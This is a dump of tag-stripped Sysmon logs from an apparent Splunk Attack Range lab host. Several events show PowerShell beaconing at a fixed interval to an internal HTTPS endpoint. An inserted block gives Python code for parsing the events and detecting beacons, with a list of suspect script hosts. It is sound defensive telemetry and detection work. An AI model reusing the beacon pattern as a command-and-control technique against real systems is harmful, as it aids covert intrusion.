Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:09.714{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=820E700ADB3D1E8DB022CFD2613B9D75,SHA256=C451ED4DAD28495E681B92C98C78673A81573D551028126BBF2E94E225828A49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:09.196{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=51CFDA1C270C0E2BA6BCEFE4F40DDF35,SHA256=BA76D9FEEA779550F8A4D71D0EB73E7F83BF7F31B91AD4F0355EC595939A4614,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:09.097{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A02034E5C3DA78A8B1145384E72CD0C,SHA256=A262965FDB8467AE96129E6E59C1555BBF5FA1CDC27423647E3C6A3590AD2C06,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:09.096{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=428A7F449D6185AEF177EF1A1E6EE122,SHA256=D0C978869196F30257E26F50F563BA444D6E5BDDEF2E1337C3E19BDF11F18534,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:39.695{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50388-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:10.718{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E78940FB11E52B53EBD93210C09224A8,SHA256=76892065DBB8604F437B5B84119F97B305DA822105363D115E0AEF39A43EE8BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:11.732{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB4F34F90E4D7ACA36C2E00532D4AE2A,SHA256=91AD3EC458116AFEDA67442401C025162309230705CDDB005A146EEF97E1A48D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:12.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C84180C941D417FE15337DB8705F955,SHA256=89249807128E86D1D554447D399DD71B84941716AC0B6D08AB56304E0432A2E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:13.776{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA8AB601CCAA9D86A32AE48F761D53DA,SHA256=F005C70C1BE05092BEE8E4CD7EFBA045A765D6F5DEECED1AA90EB2A66BCD92EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:44.756{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50389-false10.0.1.12-8000- 23542300x800000000000000036496272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:14.796{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB123AB0CA8FF9498E6CC12DDEC63CB,SHA256=74CDF4FFB7BB638BF0C7CB71D6105F798F9B89901393C16F63E68D83973534FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:15.811{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D21CD5A92F8DE9B0729E08341C0318DA,SHA256=A84876F3CCF267DD345ECC409701E122EE6860229277885710653A4A8F954ADD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:15.143{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E8221794FF9992AD3439156134CE7D7C,SHA256=9DAE5EA706EFFC4FE2D5C8993A8EC831972B171DA858404D08F0D7C509E09852,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:45.808{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50390-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:16.826{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=833103081EC774D0FBE113E396954139,SHA256=74DDE1EBBC2884E500264D57989E7AACBF168E803E2C679657F6CE45ED88CFC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:17.841{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC9BF08458C334E5EB5D0041F29FBB3,SHA256=B8618081B94FCBBB10645DAF0830475E7D45E788DE73533E67D8615FFA9769AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:18.888{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5923E406D52F1999128C68BCC85D3C46,SHA256=F77BC5E227D461EE9A0A60F5793A0B985573A5DCDD7C71B0060ABBFCEF384DC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:19.891{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3645CDEF0DBA2DD1D9590ABB78A586BE,SHA256=011046FF3483AF7994A159892CA376E86E680C3DF4B7BCB36A6E8B540DE43314,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:20.908{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D9D90C43AA9E99F8E9C72975C5F5DB1,SHA256=71BB709CC8FBD10EF1C9472A979CA78ED07CFF3B05C9B607A76081F35BB6168C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:20.175{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EE312C0CE1813420D2D05DA187869C15,SHA256=87D641502F9186C4FB2662A279655356B2EDE385956A124F88EEFACE69A2AFD3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496285Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:21.939{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCA30B3B2D8DA4ECEA47FAB5D4B7CF8D,SHA256=DC130DE88B5200DA63E5F2C1858E3BDFC0C44992AB3ECBE8D722953B7D508346,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
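The records above are Sysmon events whose XML tags were stripped on extraction, so consecutive fields run together and many records share one line. The following is an added example (written for this page, not code from Splunk, Sysmon or the Attack Range project) that shows how an analyst can still work with such a dump: it splits the stream on the fixed record header (EventID, Version, Level, Task, Opcode, the Keywords value 0x8000000000000000, an 8-digit EventRecordID, then the channel name, using the fact that Sysmon's Task equals its EventID), parses the Event ID 3 network-connection bodies, and then looks for periodic connections per process and destination. Because the delimiters are gone, the body parser relies on stated assumptions: RuleName is "-", the Image ends in ".exe", and host names are either "-" or end in a letter, which holds for every record on this page but is a heuristic, not a property of Sysmon. The sample records are copied from the page (four powershell.exe connections by ATTACKRANGE\REED_SCHMIDT to 10.0.1.16:443, four streamfwd.exe connections to 10.0.1.12:8000, and one Event ID 10 record to show non-network events are skipped). Both processes connect at near-constant intervals, so the example also shows why a periodicity rule alone is noisy and needs a triage step for the process image and account.

```python
"""Split a tag-stripped Sysmon event stream and hunt for periodic connections."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Sample records copied from the page above (Sysmon Event IDs 3 and 10), joined
# with single spaces the way the extracted page runs them together.
RECORDS = [
    r"354300x800000000000000036496268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:39.695{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50388-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000036496253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.774{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50387-false10.0.1.12-8000-",
    r"354300x800000000000000036496273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:44.756{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50389-false10.0.1.12-8000-",
    r"354300x800000000000000036496277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:45.808{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50390-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"10341000x800000000000000036496304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F7C-6140-5556-04000000C801}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781",
    r"354300x800000000000000036496283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:50.765{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50391-false10.0.1.12-8000-",
    r"354300x800000000000000036496284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:50.834{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50392-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000036496311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:56.784{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50393-false10.0.1.12-8000-",
    r"354300x800000000000000036496312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:56.863{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50394-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
]
STREAM = " ".join(RECORDS)

# Record header: EventID, Version, Level, Task (== EventID in Sysmon, hence the
# backreference), Opcode, Keywords, 8-digit EventRecordID, channel name.
HEADER = re.compile(
    r"(?P<eid>\d{1,2})(?P<ver>\d)(?P<lvl>\d)(?P=eid)(?P<op>\d)"
    r"0x8000000000000000(?P<rid>\d{8})Microsoft-Windows-Sysmon/Operational"
)

# Assumption for this page: a host name field is "-" or ends in a letter.
HOST = r"-|[A-Za-z][A-Za-z0-9.-]*?[A-Za-z]"
PORTNAME = r"-|[a-z][a-z0-9-]*"
IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
# Event ID 3 body in Sysmon schema order; RuleName assumed to be "-".
NET = re.compile(
    r"^(?P<computer>.+?)-(?P<utc>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})"
    r"\{(?P<pguid>[0-9A-F-]{36})\}(?P<pid>\d+)(?P<image>[A-Za-z]:\\.+?\.exe)"
    r"(?P<user>.+?)(?P<proto>tcp|udp)(?P<initiated>true|false)(?:true|false)"
    r"(?P<sip>" + IPV4 + r")(?P<shost>" + HOST + r")(?P<sport>\d{1,5})(?:" + PORTNAME + r")"
    r"(?:true|false)(?P<dip>" + IPV4 + r")(?P<dhost>" + HOST + r")(?P<dport>\d{1,5})"
    r"(?P<dportname>" + PORTNAME + r")$"
)


def split_records(stream):
    """Return [(event_id, record_id, body)] with body starting after the channel."""
    heads = list(HEADER.finditer(stream))
    out = []
    for i, m in enumerate(heads):
        end = heads[i + 1].start() if i + 1 < len(heads) else len(stream)
        out.append((int(m["eid"]), int(m["rid"]), stream[m.end():end].strip()))
    return out


def network_events(stream):
    """Parse every Event ID 3 record into a dict; unparseable bodies are skipped."""
    events = []
    for eid, rid, body in split_records(stream):
        if eid != 3:
            continue
        m = NET.match(body)
        if not m:
            continue
        ev = m.groupdict()
        ev["rid"] = rid
        ev["time"] = datetime.strptime(ev["utc"], "%Y-%m-%d %H:%M:%S.%f")
        events.append(ev)
    return events


def find_beacons(events, min_count=3, max_cv=0.25):
    """Flag (process, destination) pairs whose connection gaps are nearly constant."""
    groups = defaultdict(list)
    for e in events:
        groups[(e["pguid"], e["image"], e["user"], e["dip"], e["dport"])].append(e["time"])
    hits = []
    for (_, image, user, dip, dport), times in groups.items():
        times.sort()
        if len(times) < min_count:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = mean(gaps)
        cv = pstdev(gaps) / period if period else float("inf")  # jitter relative to period
        if cv <= max_cv:
            hits.append({"image": image, "user": user, "dest": f"{dip}:{dport}",
                         "count": len(times), "period_s": round(period, 2), "cv": round(cv, 3)})
    return hits


# Script hosts that rarely have a legitimate reason to beacon; SYSTEM-run agents
# such as the Splunk forwarder are periodic by design and are filtered out here.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def triage(hits):
    """Keep beacon candidates from a script host running as a non-service account."""
    return [h for h in hits
            if h["image"].rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS
            and not h["user"].upper().startswith("NT AUTHORITY\\")]


if __name__ == "__main__":
    hits = find_beacons(network_events(STREAM))
    for h in hits:
        print("periodic:", h)
    for h in triage(hits):
        print("SUSPECT:", h["user"], h["image"], "->", h["dest"], f"every ~{h['period_s']}s")
```

On the page's own records the periodicity rule fires twice (streamfwd.exe to 10.0.1.12:8000 at about 6.0 s, powershell.exe to 10.0.1.16:443 at about 5.7 s), and only the REED_SCHMIDT powershell.exe beacon survives triage. For a real investigation the same split_records output can be fed to per-EventID parsers for the Event ID 1 and 10 records on the page, and the heuristics in NET should be replaced by proper field boundaries if the original XML can be re-exported.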
354300x800000000000000036496284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:50.834{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50392-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:50.765{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50391-false10.0.1.12-8000- 23542300x800000000000000036496286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:22.969{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=325132C7F4E7DDF42C4A0982A40EBE68,SHA256=202B5459E49DCAA93E8CFA04DC9CCA87DF4159F6ADDFBB6198F77E2FFB86259B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:23.987{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F648B4B78C0E0B90187D55CA79897FC,SHA256=08981DCB9CB1B01449605DF5A68283AEA9309C774504000AF2AE1872378BC42B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:23.206{B81B27B7-4012-611D-1100-00000000C801}968NT 
AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=8986BBB726E2C7D9691149357A294718,SHA256=9D76E0BCCB2AF491FB41C25DC736AE1DB2DB4ECA329143CE30B05EAA81A4D886,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F7C-6140-5556-04000000C801}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:24.936{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:11:24.936{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:24.936{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9F7C-6140-5556-04000000C801}4664C:\Program 